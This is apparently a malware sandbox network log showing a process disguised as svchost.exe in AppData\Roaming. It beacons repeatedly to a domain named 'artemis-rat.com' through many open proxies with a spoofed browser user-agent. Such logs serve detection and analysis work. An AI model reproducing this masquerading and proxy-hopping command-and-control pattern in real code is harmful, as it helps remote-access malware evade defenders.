2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
                                                                                    Mar 9, 2024 13:14:28.557225943 CET1286INData Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22
                                                                                    Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
                                                                                    Mar 9, 2024 13:14:28.557326078 CET1286INData Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63
                                                                                    Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
                                                                                    Mar 9, 2024 13:14:28.557590961 CET1286INData Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e
                                                                                    Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
                                                                                    Mar 9, 2024 13:14:28.557602882 CET298INData Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69
                                                                                    Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
                                                                                    Mar 9, 2024 13:14:28.560094118 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a3 86 12 a2 7e f6 23 b3 b4 bf 4e 67 53 a4 37 44 57 c9 b5 9f 56 fc 4f 14 3a e9 9e f2 49 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR~#NgS7DWVO:I*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:28.918042898 CET494INHTTP/1.1 400 Bad Request
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: Apache/2.4.56 (Ubuntu)
                                                                                    Content-Length: 312
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1935192.168.2.55592652.73.224.54312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.206892967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.428816080 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1936192.168.2.556034104.18.234.2188043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.212034941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.366350889 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1937192.168.2.555867134.209.189.428043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.213728905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.504620075 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1938192.168.2.555956104.200.152.30414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.215873003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1939192.168.2.55620645.144.30.23244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.225334883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1940192.168.2.55576590.188.250.168043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.227089882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1941192.168.2.55621445.144.30.23244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.227526903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1942192.168.2.55621645.144.30.23244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.229366064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1943192.168.2.55600335.185.196.38312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.229449034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.431152105 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1944192.168.2.55621945.144.30.23244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.231520891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1945192.168.2.555959198.199.86.11808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.233824968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.374125957 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1946192.168.2.55622643.157.32.23044343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.237121105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1947192.168.2.55622743.157.32.23044343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.237951994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1948192.168.2.555846103.23.100.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.238476038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1949192.168.2.55622843.157.32.23044343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.240051031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1950192.168.2.55622943.157.32.23044343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.241300106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1951192.168.2.55589037.187.77.584950743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.251113892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.911223888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.942796946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1952192.168.2.555904119.196.168.1838043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.251535892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1953192.168.2.555908178.33.163.1564238043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.253846884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.895586014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.833762884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.833678007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.646301985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1954192.168.2.556009157.185.157.1512658943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.253921986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1955192.168.2.55592213.81.217.2018043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.260668993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.911222935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.833754063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.646279097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.333600044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1956192.168.2.55605292.204.134.38937543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.262767076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1957192.168.2.55601294.131.63.44312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.265136957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.485569954 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
